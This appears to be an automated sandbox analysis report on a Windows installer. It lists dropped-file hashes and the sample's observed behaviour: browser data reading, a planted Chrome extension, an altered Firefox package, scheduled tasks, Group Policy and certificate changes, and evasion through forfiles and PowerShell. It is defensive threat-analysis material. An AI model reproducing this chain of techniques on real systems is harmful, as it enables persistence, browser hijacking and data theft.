SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 10379cf6c154cf03d8d7e4ff25288e3d
SHA1 eff5c4511e9e22760a332700bd3dc4cf824b07c5
SHA256 85cfddbb1317c3ad1cb93a862763b15be729841081aa8e6bc5a0e2e39325e98c
SHA512 f8c424a0121d564c5def9cbcbbdc9f2582be73e7181964bc40d96c57e0f9adb7316ae65d3baecaae36129266026133c5fc1629182b031b6f6cfefe1d65947b47

C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml

MD5 cc04db55bd3f33f5f3898ba45273c5f7
SHA1 b658dcceb95b17eb52ef759edc55b1c45ec0b976
SHA256 1682df49b35dee26247e7634832dcecbfc8abe1cb3bf4128edc75720e57bc96e
SHA512 c6e0a2de40d87853f9fcbbdfcd6093a275a4ff6fd607455bd789a6f70d9b09106a02a8c05ee6639af71b72e43508acb36d05ea227f28bdddfccfae0a76eb51f5

C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml

MD5 6f88a26059770bb93d7a850dfb131f25
SHA1 6cb009ac06b73977c6007f697092dc9d8098b26d
SHA256 4a21cce8b4e5c9613628d6b611d875baa8e65eb3f7e7e1864668ba46362fb45c
SHA512 543962910bc0cebef2baf2b97d97f4bb419f1276a5891e81dbfc4e38022caa641786350cdc2f0b5b4894e929ff11b763df008c1e977e86e008b1363137e6e9a5

C:\ProgramData\eiYaNjTCbhfbMeVB\OUuKJjg.xml

MD5 9a87d1ddde9efbb7a7375710c7c0fe10
SHA1 d73276c40668b05a847f0796dc212e483eab67c9
SHA256 4c5a26395086f1df256e8b02ec70869cbb37d509860c8e7cb09d59d72855a913
SHA512 ad243bd7ca33a7a9361b394e21851835b4ceb49a75f40be5eb0e1519df9544de6b05dd1bfa7ab544fada280506a36aeef942084741deb1338a856e4c58345d65

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml

MD5 b23681fb0adfe12001c9dbbe7264be88
SHA1 f247ce4500d13dd079aab50e214493c8bb5af0e9
SHA256 a21c7497075df18b9d66393a0d30fa5dc34d1a2845fd60e694d4f71f28941d73
SHA512 1a9dce109e9d06c07e8c1f203aadafbbbba8ed2410c2daabecabd546720274aff52aa2768d74bd30f76b1fdff2a38c93a095ac26665648aafa31ff94760e8b4e

C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml

MD5 549c2a6aa9d994beb6e82d6a23e48230
SHA1 12b77d549143d1f8feac94a049350253223e4b39
SHA256 c5f0a5be7f5b098e8b3fead9f2c13ed4c633ae38f32e1ea6ee480b818f7d978a
SHA512 1e4a3dd1980afb3fd40a0b683a30b1f371a68b7e4c87260aca940a6519471b1fc5d25eebd3e08e97358246c92a724b3bc2cbdd9fe2a23d24f41e05e9443cb06e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs.js

MD5 85f51981e0996109f07589b78cae351d
SHA1 11a592ac88ed13a5e71fdcbba726951f3b8cc4ab
SHA256 a2c5e7b1fc4f3f30fcd9eaaf80b027c8e5137275a40cc21c0e2dc5f6d06f412c
SHA512 616d8b53a4e86f52569cfec6e88b5fa76f65f475e46c04e0a66bb7bcdaa21cb847f04144b964cc02af21acc75d42e6bf0d7ef038d80ac8ff4c62870bccb03332

C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

memory/1608-290-0x0000000003EE0000-0x0000000003F53000-memory.dmp

memory/1608-305-0x00000000041F0000-0x00000000042AD000-memory.dmp

\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

MD5 4903265b4d4031ba26819aea4b49997a
SHA1 226207dcb82dedcde41368a9df406871a826efb6
SHA256 2c81bb199ce76f671dd313f13668f870bef07b6a35cbc2b0f20b35ba2c3d99eb
SHA512 02c393e2f5c88a333c83a6b364906b6743913c70deb12ae6b0820b042b693b91b0ec85ac31a5db061a8564f3b5472c38c202f7a10932feea54fb51e0b22201dd

\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

MD5 0dde927f35da834f93206d8dd5b693f5
SHA1 87bd61332b452b28769b26518d5c33f5929f4a7e
SHA256 fd9dfe67e13a909aed94cdb0d412c36e85a0a6b6cbba1a302e9e0981259ba708
SHA512 3ec6facb579cdaf5f5f8b9692f0c22a24b26ecd0e05257d26f177303407309a52cb6e66435a20a7a1294e419c412a2881252bd046fc21e75b9124a75e2e181ab

\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

MD5 602508148063589973dc8c2966b34631
SHA1 45bba65558b9285e0da491f0335e81431145ec25
SHA256 09c46f5c8972d160f2d12e474cc418b8330279c8465dd7315bc3bed7559de7e2
SHA512 0923b0b58c6f91f3d5296d6b4aa692964f591f635f2d2d202eb7464d59794a8d919a3c8c2f683c4e4f292c92eca65ffbd2e204c5fb3ef0a1af6b843cce603058

\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

MD5 20b1a3686387c8fa9f493835636ff6b1
SHA1 e5c8d1ab0d47938c022ef3500f646e6e71dad796
SHA256 63cc795ef8a4f8abb0e1dc666d18b022d8917935634c7e2e720a9b45a332219c
SHA512 856eb677eafdaacaf0184c87e51a5b037de9c05a49750e6e968f083b169f285b926380bd49dfc35fc7fa777d9a500bbead2732e3472bed7f34542ae8dce7bc7f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3a56c67f6dd4ec7f64731f37b9c01a63
SHA1 9d1df43ac137af5563d70b02675311fe6631218a
SHA256 19fb4a64ac821a33c0538e8f50916f5bd3912e3bbb90ea282947673f98873609
SHA512 98583a21f477d9f04f71a39a5e42bf776a5a00990a5ac36e75962a0bc5a72707c533389fd0f984b67271d04671d8da29ff5a70a89c998014cf145458df391920

memory/2264-325-0x0000000001430000-0x0000000002334000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\fXwrAtP.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\ircnoIG.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ejUsjSAbKxbqc.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\QzjBmRy.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\WpdQVfX.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\TOIdVSI.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\jsSbxq.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\GasXUvu.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\ZKGKZDZ.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{48d314f9-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
